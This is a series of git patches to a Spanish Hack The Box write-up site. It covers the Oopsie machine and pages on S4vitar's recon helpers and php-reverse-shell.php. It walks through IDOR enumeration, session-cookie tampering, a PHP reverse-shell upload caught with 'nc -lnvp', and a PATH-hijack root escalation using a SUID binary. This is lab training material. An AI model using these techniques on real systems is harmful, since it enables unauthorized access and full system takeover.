+Y al recargar la página podemos ver como se nos reporta un hash en base64.
+
+
+
+Lo copiaremos para poder pasarlo a una terminar y tratar de descifrarlo.
+
+
+
From d4cfdba0761967d97e154dd552df14208e68aee8 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:52:34 +0200
Subject: [PATCH 0008/1701] Update index.md
---
index.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/index.md b/index.md
index 213c75bdc4b..4bd75abac13 100644
--- a/index.md
+++ b/index.md
@@ -1,3 +1,7 @@
+# Hack The Box
+
+## Starting Points
+
[HTB-Oopsie](./another-page2.html)
[HTB-Responder](./HTB-Responder.html)
From f959a76a03e2c31f90493986127c278a5de6ac67 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:54:23 +0200
Subject: [PATCH 0009/1701] Rename another-page2.md to HTB-Oopsie.md
---
another-page2.md => HTB-Oopsie.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename another-page2.md => HTB-Oopsie.md (100%)
diff --git a/another-page2.md b/HTB-Oopsie.md
similarity index 100%
rename from another-page2.md
rename to HTB-Oopsie.md
From 84b551fcef9b7807ae750c862b315ac1248672fe Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:54:50 +0200
Subject: [PATCH 0010/1701] Update index.md
---
index.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 4bd75abac13..c6b81dc5558 100644
--- a/index.md
+++ b/index.md
@@ -2,7 +2,7 @@
## Starting Points
-[HTB-Oopsie](./another-page2.html)
+[HTB-Oopsie](./HTB-Oopsie.html)
[HTB-Responder](./HTB-Responder.html)
From ec5080dfdc30dfc7cab8a0486d780c9fca605f1c Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 20:56:17 +0200
Subject: [PATCH 0011/1701] Update index.md
---
index.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/index.md b/index.md
index c6b81dc5558..880d22d2e9b 100644
--- a/index.md
+++ b/index.md
@@ -1,11 +1,11 @@
-# Hack The Box
+# **Hack The Box**
## Starting Points
[HTB-Oopsie](./HTB-Oopsie.html)
-
[HTB-Responder](./HTB-Responder.html)
+
---
layout: default
---
From 1d97ce2bdcd2896c428f5ce87ddd7a2f5f878129 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:01:15 +0200
Subject: [PATCH 0012/1701] Update index.md
---
index.md | 8 ++++++++
1 file changed, 8 insertions(+)
diff --git a/index.md b/index.md
index 880d22d2e9b..d8ef621b2d0 100644
--- a/index.md
+++ b/index.md
@@ -3,9 +3,17 @@
## Starting Points
[HTB-Oopsie](./HTB-Oopsie.html)
+
[HTB-Responder](./HTB-Responder.html)
+
+## Herramientas y Scripts
+
+[wichSystem](./WichSystem.html)
+
+[extractPorts](./ExtractPorts.html)
+
---
layout: default
---
From 9c52920a440eb644cf12dd5346651cd446fbdfd9 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:03:22 +0200
Subject: [PATCH 0013/1701] Create WichSystem.md
---
WichSystem.md | 57 +++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 WichSystem.md
diff --git a/WichSystem.md b/WichSystem.md
new file mode 100644
index 00000000000..5ca4aa37b0b
--- /dev/null
+++ b/WichSystem.md
@@ -0,0 +1,57 @@
+# WichSystem
+
+
+
+Esta herramienta es un pequeño script en python creado por S4vitar que sirve
+para saber si estamos frente un sistema operativo Windows o Linux.
+
+ El script básicamente diferencia entre el ttl de Linux y el de Windows de
+ forma automáticamente.
+
+ Recordemos que Windows tiene un ttl=128 mientras que Linux tiene un ttl=65.
+
+ # Ejecución:
+
+ wichSystem.py [Ip Víctima]
+
+
+
+
+
+
+# Instalación:
+
+Para instalar esta herramienta simplemente nos descargamos o copiamos el
+archivo wichSystem.py y lo cramos en el directorio /usr/bin/
+
+En caso de descargarlo, simplemente lo depositamos en ese directorio.
+En caso de crearlo:
+
+
+
+Vamos al directorio:
+
+ cd /usr/bin/
+
+Creamos el archivo wichSystem.py:
+
+ sudo nano wichSystem.py
+
+Copiamos y pegamos el scrip (lo puedes encontrar en este mismo repositorio
+como wichSystem.py).
+
+https://github.com/F1r0x/WichSystem/blob/main/wichSystem.py
+
+Guardamos : Cntrl + o
+
+Salimos : Cntrl + x
+
+Ya tendriamos listo nuestra nueva herramienta WichSystem.
+
+# Menciones:
+
+Esta herramienta no la he creado yo, solo la recopilo y comparto su instalación.
+El creador de está herramienta es el creador de contenido S4vitar, tiene diversos canales en Youtube y retrasmite en
+Twitch sobre temas de ciber seguridad y resolución de maquinas de Hack the Box.
+
+S4vitar: https://github.com/s4vitar
From b99fcb108cbae95d3c787a48e5878636be24d126 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:06:05 +0200
Subject: [PATCH 0014/1701] Create ExtractPorts.md
---
ExtractPorts.md | 40 ++++++++++++++++++++++++++++++++++++++++
1 file changed, 40 insertions(+)
create mode 100644 ExtractPorts.md
diff --git a/ExtractPorts.md b/ExtractPorts.md
new file mode 100644
index 00000000000..8fc4f25652f
--- /dev/null
+++ b/ExtractPorts.md
@@ -0,0 +1,40 @@
+# ExtractPorts
+
+ExtractPorts es una función creada por S4vitar.
+
+Esta herramienta nos mostrará en formato bat y los puertos encontrados.
+Mediante Cntrl + Shift + v podremos pegar los puertos a la terminal
+automáticamente.
+
+
+
+ extractPorts allPorts
+
+ allPorts : Archivo previamente definido.
+
+ 
+
+ Cntrl + Shift + v : Para pegar los puertos a la terminal.
+
+ # Instalación:
+
+ Para la instalación de esta herramienta previamente se recomienda tener
+ instalado 'bat' que es una mejora del comando 'cat'.
+
+ Para poder tener está función activa, simplemente nos dirigiremos
+ a la carpeta .bashrc o .zshrc (la que utilicéis) y pegaremos la función.
+
+ Esta función la podéis encontrar tanto en el perfil de S4vitar como
+ en este repositorio.
+
+ S4vitar: https://github.com/s4vitar
+
+ Mi repositorio: https://github.com/F1r0x/ExtractPorts/blob/main/extractPorts
+
+ 
+
+# Menciones:
+
+Esta función está creada por el creador de contenido S4vitar, podéis
+encontrar una gran cantidad de información sobre ciberseguridad en
+sus canales de Youtube y Twitch.
From fd1c284eee0a84514ef9c09653ff14ed7c67dde6 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:06:47 +0200
Subject: [PATCH 0015/1701] Update index.md
---
index.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/index.md b/index.md
index d8ef621b2d0..b4b0344cf8b 100644
--- a/index.md
+++ b/index.md
@@ -10,9 +10,9 @@
## Herramientas y Scripts
-[wichSystem](./WichSystem.html)
+[WichSystem](./WichSystem.html)
-[extractPorts](./ExtractPorts.html)
+[ExtractPorts](./ExtractPorts.html)
---
layout: default
From d39e486e04ed2757700fa2820fd83c781bb2d256 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:27:29 +0200
Subject: [PATCH 0016/1701] Update index.md
---
index.md | 124 -------------------------------------------------------
1 file changed, 124 deletions(-)
diff --git a/index.md b/index.md
index b4b0344cf8b..98d8970d0ad 100644
--- a/index.md
+++ b/index.md
@@ -13,127 +13,3 @@
[WichSystem](./WichSystem.html)
[ExtractPorts](./ExtractPorts.html)
-
----
-layout: default
----
-
-Text can be **bold**, _italic_, ~~strikethrough~~ or `keyword`.
-
-[Link to another page](./another-page.html).
-
-There should be whitespace between paragraphs.
-
-There should be whitespace between paragraphs. We recommend including a README, or a file with information about your project.
-
-# Header 1
-
-This is a normal paragraph following a header. GitHub is a code hosting platform for version control and collaboration. It lets you and others work together on projects from anywhere.
-
-## Header 2
-
-> This is a blockquote following a header.
->
-> When something is important enough, you do it even if the odds are not in your favor.
-
-### Header 3
-
-```js
-// Javascript code with syntax highlighting.
-var fun = function lang(l) {
- dateformat.i18n = require('./lang/' + l)
- return true;
-}
-```
-
-```ruby
-# Ruby code with syntax highlighting
-GitHubPages::Dependencies.gems.each do |gem, version|
- s.add_dependency(gem, "= #{version}")
-end
-```
-
-#### Header 4
-
-* This is an unordered list following a header.
-* This is an unordered list following a header.
-* This is an unordered list following a header.
-
-##### Header 5
-
-1. This is an ordered list following a header.
-2. This is an ordered list following a header.
-3. This is an ordered list following a header.
-
-###### Header 6
-
-| head1 | head two | three |
-|:-------------|:------------------|:------|
-| ok | good swedish fish | nice |
-| out of stock | good and plenty | nice |
-| ok | good `oreos` | hmm |
-| ok | good `zoute` drop | yumm |
-
-### There's a horizontal rule below this.
-
-* * *
-
-### Here is an unordered list:
-
-* Item foo
-* Item bar
-* Item baz
-* Item zip
-
-### And an ordered list:
-
-1. Item one
-1. Item two
-1. Item three
-1. Item four
-
-### And a nested list:
-
-- level 1 item
- - level 2 item
- - level 2 item
- - level 3 item
- - level 3 item
-- level 1 item
- - level 2 item
- - level 2 item
- - level 2 item
-- level 1 item
- - level 2 item
- - level 2 item
-- level 1 item
-
-### Small image
-
-
-
-### Large image
-
-
-
-
-### Definition lists can be used with HTML syntax.
-
-
-- Name
-- Godzilla
-- Born
-- 1952
-- Birthplace
-- Japan
-- Color
-- Green
-
-
-```
-Long, single-line code blocks should not wrap. They should horizontally scroll if they are too long. This line should be long enough to demonstrate this.
-```
-
-```
-The final element.
-```
From ed344d7ba67c947d4a56fecd424fc24665db0ddf Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:31:09 +0200
Subject: [PATCH 0017/1701] Update index.md
---
index.md | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 98d8970d0ad..3fcbfe87129 100644
--- a/index.md
+++ b/index.md
@@ -6,10 +6,12 @@
[HTB-Responder](./HTB-Responder.html)
-
+---
## Herramientas y Scripts
[WichSystem](./WichSystem.html)
[ExtractPorts](./ExtractPorts.html)
+
+---
From f4b479bfcc9c6ecaab296afd6f054c13110ab44f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:34:32 +0200
Subject: [PATCH 0018/1701] Update index.md
---
index.md | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/index.md b/index.md
index 3fcbfe87129..5a4a603bd8d 100644
--- a/index.md
+++ b/index.md
@@ -6,7 +6,7 @@
[HTB-Responder](./HTB-Responder.html)
----
+
## Herramientas y Scripts
@@ -14,4 +14,7 @@
[ExtractPorts](./ExtractPorts.html)
+[php-reverse-shell.php](./php-reverse-shell.html)
+
+
---
From 00c4873b2f751f0fac5e7a28461e6fc1e3e50737 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:38:13 +0200
Subject: [PATCH 0019/1701] Create php-reverse-shell.md
---
php-reverse-shell.md | 48 ++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 48 insertions(+)
create mode 100644 php-reverse-shell.md
diff --git a/php-reverse-shell.md b/php-reverse-shell.md
new file mode 100644
index 00000000000..cd0680922bc
--- /dev/null
+++ b/php-reverse-shell.md
@@ -0,0 +1,48 @@
+# php-reverse-shell.php
+
+Este script realizará una conexión TCP saliente a una
+IP y un puerto codificados.
+
+El destinatario recibirá un shell ejecutándose como el
+usuario actual (normalmente apache).
+
+# Configuración:
+
+La configuración es muy simple, lo único que tenemos que hacer es cambiar la Ip
+por la de nuestro sistema y establecer el puerto por el que queremos ponernos
+en escucha.
+
+Abrimos una terminar y modificamos el archivo php-reverse-shell.php
+
+ sudo nano php-reverse-shell.php
+
+
+
+
+Establecemos nuestra Ip (tun0) y el puerto de escucha (en este ejemplo usaremos el 8080). Para saber
+cuál es nuestra Ip, podemos verlo mediante el comando 'ipconfig':
+
+ sudo ifconfig
+
+
+
+
+Guardamos (Cntrl + o) y salimos (Cntrl + x).
+
+# Ejecución:
+
+Primero cargamos el archivo php-reverse-shell.php a una máquina víctima. Luego, mediante la herramienta NetCat
+nos pondremos por escucha por el puerto previamente definido (en nuestro caso el 8080):
+
+ nc -lnvp 8080
+
+Ejecutamos el archivo php-reverse-shell.php (recargamos el navegado en la dirección en la que se encuentre el
+archivo). Si todo ha funcionado correctamente se nos tendría que abrir una shell en la terminal en la que estábamos
+en escucha.
+
+
+
+En caso de no funcionaros un puerto, seguir probando, ya que en muchas ocasiones esos puertos están cerrados y no
+se puede acceder a través de ellos.
+
+Otra causa de fallo habitual es que el sistema tenga algún firewall que no permita pasar a la reverse shell.
From 83f863131c2439d480bccb95162dad9752e8f27b Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:43:36 +0200
Subject: [PATCH 0020/1701] Update php-reverse-shell.md
---
php-reverse-shell.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/php-reverse-shell.md b/php-reverse-shell.md
index cd0680922bc..69a8ef16b6a 100644
--- a/php-reverse-shell.md
+++ b/php-reverse-shell.md
@@ -6,6 +6,11 @@ IP y un puerto codificados.
El destinatario recibirá un shell ejecutándose como el
usuario actual (normalmente apache).
+# Repositorio:
+
+Desde aquí podreís copiar el script:
+https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php
+
# Configuración:
La configuración es muy simple, lo único que tenemos que hacer es cambiar la Ip
From 7a1ace2c1fb59de650d2f16f6605fdf62fc4478f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:46:28 +0200
Subject: [PATCH 0021/1701] Update php-reverse-shell.md
---
php-reverse-shell.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/php-reverse-shell.md b/php-reverse-shell.md
index 69a8ef16b6a..7f504b6411b 100644
--- a/php-reverse-shell.md
+++ b/php-reverse-shell.md
@@ -9,7 +9,7 @@ usuario actual (normalmente apache).
# Repositorio:
Desde aquí podreís copiar el script:
-https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php
+[php-reverse-shell.php](https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php)
# Configuración:
From d87a1f5ea3f278146f427aebb1d0299e448d048f Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:54:20 +0200
Subject: [PATCH 0022/1701] Update HTB-Oopsie.md
---
HTB-Oopsie.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/HTB-Oopsie.md b/HTB-Oopsie.md
index f08ec0026af..daab05eb2c2 100644
--- a/HTB-Oopsie.md
+++ b/HTB-Oopsie.md
@@ -27,7 +27,7 @@ En primer lugar, vamos a comprobar si tenemos conexión
nuestro directorio mediante la herramienta 'extractPorts'.
Puedes encontrar la descripción y la herramienta extractPorts
- creada por S4vitar en mi repositorio: https://github.com/F1r0x/ExtractPorts
+ creada por S4vitar en mi repositorio: [ExtractPorts](https://f1r0x.github.io/ExtractPorts.html)
Es este caso podemos observar los siguientes puertos
abiertos por el protocolo TCP:
From 58cef0184e5934c911c8b31ef347b92105fde117 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 21:56:58 +0200
Subject: [PATCH 0023/1701] Update ExtractPorts.md
---
ExtractPorts.md | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/ExtractPorts.md b/ExtractPorts.md
index 8fc4f25652f..47e923413d2 100644
--- a/ExtractPorts.md
+++ b/ExtractPorts.md
@@ -27,9 +27,9 @@ automáticamente.
Esta función la podéis encontrar tanto en el perfil de S4vitar como
en este repositorio.
- S4vitar: https://github.com/s4vitar
+ S4vitar: [https://github.com/s4vitar](https://github.com/s4vitar)
- Mi repositorio: https://github.com/F1r0x/ExtractPorts/blob/main/extractPorts
+ Mi repositorio: [https://github.com/F1r0x/ExtractPorts/blob/main/extractPorts](https://github.com/F1r0x/ExtractPorts/blob/main/extractPorts)

From cb805200a87211cf27319d153767f57ebb47c342 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Fri, 22 Apr 2022 22:16:48 +0200
Subject: [PATCH 0024/1701] Update HTB-Oopsie.md
---
HTB-Oopsie.md | 24 +++++++++++++++++++++++-
1 file changed, 23 insertions(+), 1 deletion(-)
diff --git a/HTB-Oopsie.md b/HTB-Oopsie.md
index daab05eb2c2..5bc99c0364e 100644
--- a/HTB-Oopsie.md
+++ b/HTB-Oopsie.md
@@ -501,10 +501,32 @@ escalar privilegios.
Un archivo SUID simepre se ejecuta como el usuario propietario del archivo, independientemente de que usuaio
pase el comando.
-En nuestro caso, el 'butracker' binario es pro piedad de 'root' y por tanto podemos ejecutalo como root ya
+En nuestro caso, el 'butracker' binario es propiedad de 'root' y por tanto podemos ejecutalo como root ya
que tiene configurado SUID.
Para ello ejecutamos 'bugtacker':
/usr/bin/bugtracker
+
+
+
+En mi caso probe con 'home' para ver que me reportava:
+
+
+
+La herramienta acepta la entrada del usuario como nombre del archivo que se leerá con el comando 'cat'. Sin embargo, no especifica la ruta completa al archivo 'cat' y podríamos aprovechar esto.
+
+Para ello nos dirigiremos al directorio '/tmp':
+
+ cd /tmp
+
+
+
+
+Y crearemos un archivo 'cat' que contenga la siguiente ruta '/bin/sh':
+
+ echo '/bin/sh' > cat
+
+ 
+
From 36c082d479b8d830ebf0ed936a6944d3ab2b5a24 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 15:50:32 +0200
Subject: [PATCH 0025/1701] Update HTB-Oopsie.md
---
HTB-Oopsie.md | 39 +++++++++++++++++++++++++++++++++++++++
1 file changed, 39 insertions(+)
diff --git a/HTB-Oopsie.md b/HTB-Oopsie.md
index 5bc99c0364e..5d162b32578 100644
--- a/HTB-Oopsie.md
+++ b/HTB-Oopsie.md
@@ -529,4 +529,43 @@ Y crearemos un archivo 'cat' que contenga la siguiente ruta '/bin/sh':

+Ahora le tenemos que dar privilegios de ejecución:
+ chmod +x cat
+
+
+
+
+Una vez preparado el archivo 'cat', debemos agregar el directorio /tmp a la variable ambiental PATH.
+
+PATH es una variable de entorno en sistemas operativos similares a Unix, DOS, OS/2 y Microsoft Windows, que especifica un conjunto de directorios donde se encuentran los programas ejecutables.
+
+Por tanto debemos introducir el directorio 'tmp' en el archivo PATH
+para poder ejecutarlo correctamente. Para ello utillizamos el siguiente comando:
+
+ export PATH=/tmp:$PATH
+
+
+
+Para confirmar que todo a salido correctamente y verificar que el directorio 'tmp' está en PATH:
+
+ echo $PATH
+
+
+
+
+Ahora, volvemos a ejecutar 'bugtracker' desde el directorio '/tmp':
+
+
+
+Genial, ya estamos registrados como 'root'. Finalmente, nos dirigimos al directorio '/root' donde encontramos el archivos 'root.txt.'.
+
+Para poder leer el archvio nos registramos como super usuarios:
+
+ sudo su
+
+Y abrimos el archivo con 'cat' donde econtramos la última flag:
+
+ cat root.txt
+
+
From 7512af1ad152e90f1b4754fe14470fecf33005f5 Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 15:52:21 +0200
Subject: [PATCH 0026/1701] Update HTB-Oopsie.md
---
HTB-Oopsie.md | 4 ++++
1 file changed, 4 insertions(+)
diff --git a/HTB-Oopsie.md b/HTB-Oopsie.md
index 5d162b32578..08466bed764 100644
--- a/HTB-Oopsie.md
+++ b/HTB-Oopsie.md
@@ -568,4 +568,8 @@ Y abrimos el archivo con 'cat' donde econtramos la última flag:
cat root.txt
+
+ 
+
+
From 8b5a9161f65cdd6bce2c4ff1dcbb980fb8439fac Mon Sep 17 00:00:00 2001
From: F1r0x <103068924+F1r0x@users.noreply.github.com>
Date: Mon, 25 Apr 2022 16:29:08 +0200
Subject: [PATCH 0027/1701] Update HTB-Oopsie.md
---
HTB-Oopsie.md | 168 +++++++++++++++++++++++++-------------------------
1 file changed, 84 insertions(+), 84 deletions(-)
diff --git a/HTB-Oopsie.md b/HTB-Oopsie.md
index 08466bed764..43d3a868ebc 100644
--- a/HTB-Oopsie.md
+++ b/HTB-Oopsie.md
@@ -85,20 +85,20 @@ En primer lugar, vamos a comprobar si tenemos conexión

Por lo que podemos suponer que tiene que existir alguna página de registro por la que poder acceder.
- Visto esto vamos a echar un vistazo al codigo fuente de la página para ver si encontramos algúna dirección
+ Visto esto vamos a echar un vistazo al código fuente de la página para ver si encontramos alguna dirección
de registro.
- Para ver el código fuente de una página, click derecho sobre la página y luego 'Ver código fuente de la página'.
+ Para ver el código fuente de una página, clic derecho sobre la página y luego 'Ver código fuente de la página'.

- En la parte final del ćodigo podemos ver como muestra un directorio login. Vamos a tratar de acceder a el mediante
+ En la parte final del ćodigo podemos ver como muestra un directorio login. Vamos a tratar de acceder a él mediante
el buscador para ver que nos reporta.

Ahora tenemos un sitio desde el que acceder. Ya que desconocemos el usuario y la contraseña (yo he probado los
- más comunes y no he tenido suerte) vamos ha acceder como invitados. Para ello le daremos a la opción Login as
+ más comunes y no he tenido suerte) vamos a acceder como invitados. Para ello le daremos a la opción Login as
Gues y tendremos acceso como invitados.

@@ -110,10 +110,10 @@ aportan:

-Dentro de account tenemos información sobre el usuario guest, un Access Id, su nombre y un correo eléctronico.
-Luego he revisado el código fuente pero en este caso no me ha reportado mucha información.
+Dentro de account tenemos información sobre el usuario guest, un Access Id, su nombre y un correo electrónico.
+Luego he revisado el código fuente, pero en este caso no me ha reportado mucha información.
-Tambien es interesante ver la url de la página, ya que nos asigna una id=2.
+También es interesante ver la url de la página, ya que nos asigna una id=2.

@@ -121,60 +121,60 @@ Tras inspeccionar las cookies es donde encontramos algo interesante.

-Podemos ver como está página utiliza cookies de inicio de sesión, en caso de tener otro role y otro user, podriamos
+Podemos ver como está página utiliza cookies de inicio de sesión, en caso de tener otro role y otro user, podríamos
intentar cambiarlos y ganar acceso a otra cuenta.
-Bien ahora pasaremos a la siguiente pestaña a ver que más nos puede reportar.
+Bien, ahora pasaremos a la siguiente pestaña a ver que más nos puede reportar.
# Branding

-Aquí podemos ver como se nos asigna una Brand Id = 2 y tambien podemos ver como las cookies de inicio de sesión
+Aquí podemos ver como se nos asigna una Brand Id = 2 y también podemos ver como las cookies de inicio de sesión
se mantienen.
# Clients

- Vemos como se nos continiua asignando una ID = 2 y nos muestra un nombre 'client'.
+ Vemos como se nos continua asignando una ID = 2 y nos muestra un nombre 'client'.
# Uploads

-Esta pestaña es muy interesante ya que parece que sirve para subir archivos a la página. El único problema
-es que no tenemos permisos de 'super admin'.
+Esta pestaña es muy interesante, ya que parece que sirve para subir archivos a la página. El único problema
+es que no tenemos permisos de 'súper admin'.
-En caso de tenerlos podriamos subir algún archivo para tratar de vulnerar la máquina o de escalar privilegios.
+En caso de tenerlos podríamos subir algún archivo para tratar de vulnerar la máquina o de escalar privilegios.
# Recopilación de toda la información:
-Tras investigar por todas las pestañas, lo más interesante que he econtrado es que todos los id de el usuario
+Tras investigar por todas las pestañas, lo más interesante que he encontrado es que todos los id del usuario
actual son iguales a 2.
-Tambien me llama la atención como en la url de la pestaña nos especifica la id=2
+También me llama la atención como en la url de la pestaña nos especifica la id=2

-Y otra cosa importante, son las cookies de inicio de sesión que emos encontrado.
+Y otra cosa importante, son las cookies de inicio de sesión que hemos encontrado.
-Ahora, tras conocer toda esta información, lo que podemos hacer es porbar otras 'id' en la url de la pestaña
-'Account'. Simplemente introducimos la misma url pero probamos con otros valores (0,1,3,4,...).
+Ahora, tras conocer toda esta información, lo que podemos hacer es probar otras 'id' en la url de la pestaña
+'Account'. Simplemente, introducimos la misma url, pero probamos con otros valores (0,1,3,4,...).

-El primer intento a sido con 0 y vemos como no a tenido resultado.
+El primer intento ha sido con 0 y vemos como no ha tenido resultado.

-Al segundo intento mediante el número id=1 vemos como nos reporta información de un usuario llamado 'admin'. Pero
-nosotros buscamos al usuario 'super admin', ya que es el que tiene pleno acceso a la carga de archviso de la
+Al segundo intento, mediante el número id=1 vemos como nos reporta información de un usuario llamado 'admin'. Pero
+nosotros buscamos al usuario 'super admin', ya que es el que tiene pleno acceso a la carga de archivos de la
pestaña Upload, así que seguimos probando.

-Vemos como tras muchos intentos vacios, nos muestra algunos usuarios.
+Vemos como tras muchos intentos vacíos, nos muestra algunos usuarios.

@@ -182,10 +182,10 @@ Finalmente, tras 30 intentos, lo conseguimos. El id=30 pertenece al usuario 'sup

-# Cookies de inicio de sesion:
+# Cookies de inicio de sesión:
Ya conoces el Acces ID (86575) y el Name (super admin), ahora tenemos que iniciar sesión como ese usuario.
-Tras probar ha iniciar sesión desda la págin anterior de registro a la que accedimos como 'Gues', veo que
+Tras probar a iniciar sesión desde la página anterior de registro a la que accedimos como 'Gues', veo que
no me permite entrar, ya que aun desconocemos la contraseña.
Entonces utilizaremos las cookies de inicio de sesión para intentar acceder como super admin. Para ello, en la
@@ -194,39 +194,39 @@ hasta la pestaña 'Almacenamiento'.

-Dentro de 'Almacenamiento' veremos una petaña llamada 'Cookies' y el dominio de la página. Bueno pues el truco
+Dentro de 'Almacenamiento' veremos una pestaña llamada 'Cookies' y el dominio de la página. Bueno, pues el truco
consiste en cambiar los parametros 'role' y 'user' actuales por los del super admin.

-Una vez introducimos los nuevos datos, recaramos la página y ya tendríamos acceso como super admin.
+Una vez introducimos los nuevos datos, recargamos la página y ya tendríamos acceso como super admin.
Para comprobarlo, nos vamos a la pestaña Uploads y vemos como ya nos permite subir archivos.

# NetCat y Reverse-Shell
-Bueno ahora que ya podemos subir archivos al sistema, vamos a probar a crear una reverse-shell.php ya que la
+Bueno, ahora que ya podemos subir archivos al sistema, vamos a probar a crear una reverse-shell.php, ya que la
url utiliza archivos '.php'.

########################### php-reverse-shell.php ################################
-En caso de utilizar Kali Linux o Parrot, lo más seguro es que ya tengais una reverse-shell en vuestros repositorios.
-En mi caso que utilizo parrot, si realizamos una busqueda del archivo 'php-reverse-shell.php' podemos ver como se
+En caso de utilizar Kali Linux o Parrot, lo más seguro es que ya tengáis una reverse-shell en vuestros repositorios.
+En mi caso que utilizo parrot, si realizamos una búsqueda del archivo 'php-reverse-shell.php' podemos ver como se
aloja en los siguientes directorios:

En mi caso me aparece en dos repositorios y luego yo he realizado una copia en la carpeta Descargas para poder
-configurar con nuestros datos nuestra reverse-shell. Es importante copiar el archivo en la carpeta Descargas
-ya que será dificil buscar nuestro archvivo desde la página de Uploads a la hora de subirlo.
+configurar con nuestros datos nuestra reverse-shell. Es importante copiar el archivo en la carpeta 'Descargas',
+ya que será difícil buscar nuestro archivo desde la página de Uploads a la hora de subirlo.
-En caso de no tener el archivo php-reverse-shelll.php en vuestro sitema, lo podeis encontrar en mi repositorio
-de github mediante el siguiente enlace: https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php
+En caso de no tener el archivo php-reverse-shelll.php en vuestro sistema, lo podéis encontrar en mi repositorio
+de GitHub mediante el siguiente enlace: https://github.com/F1r0x/php-reverse-shell.php/blob/main/php-reverse-shell.php
-Para tenerlo, simplemente lo copiais, abris una terminal y crearemos el archivo mediante nano:
+Para tenerlo, simplemente lo copiáis, abrís una terminal y crearemos el archivo mediante nano:
nano php-reverse-shell.php
@@ -234,8 +234,8 @@ Pegamos todo el script, guardamos (Cntrl + o) y salimos (Cntrl + x).
# Configurar nuestra reverse-shell:
-Ya tendriamos la reverse-shell, ahora solo faltaría configurarla. Para ello, desde el directorio en el que este
-el archivo php-reverse-shell.php (recomiendo que sea Descargas), meidante el comando nano cambiaremos la Ip por
+Ya tendríamos la reverse-shell, ahora solo faltaría configurarla. Para ello, desde el directorio en el que esté
+el archivo php-reverse-shell.php (recomiendo que sea Descargas), mediante el comando nano cambiaremos la Ip por
la nuestra y estableceremos un puerto, desde el cual, posteriormente con NetCat nos pondremos en escucha.
La configuración es muy simple, lo único que tenemos que hacer es cambiar la Ip
@@ -260,11 +260,11 @@ cuál es nuestra Ip, podemos verlo mediante el comando 'ipconfig':
Guardamos (Cntrl + o) y salimos (Cntrl + x).
-Ya tendriamos nuestro archivo php-reverse-shell.php preparado. Ahora lo siguiente seria tratar de subirlo a la
+Ya tendríamos nuestro archivo php-reverse-shell.php preparado. Ahora lo siguiente seria tratar de subirlo a la
página desde la pestaña Uploads.
(NOTA: La Ip de la máquina que yo os muestro a lo largo del write-up va cambiando debido a que realizarlo
-a llevado horas y he tenido que reiniciar varias veces la máquina)
+ha llevado horas y he tenido que reiniciar varias veces la máquina)

@@ -283,9 +283,9 @@ Perfecto, ya tendríamos nuestro archivo subido.

- Ahora faltaría preparar nuestro NetCat para que se pongo en modo escucha por el puerto 8080.
- Antes de probar el 8080 probe otros con el cual no conseguí establecer conexión para que
- lo tengaís en cuenta.
+ Ahora faltaría preparar nuestro NetCat para que se ponga en modo escucha por el puerto 8080.
+ Antes de probar el 8080 probé otros con el cual no conseguí establecer conexión para que
+ lo tengáis en cuenta.
Para ponernos en escucha, abrimos una terminal y ejecutamos el siguiente comando:
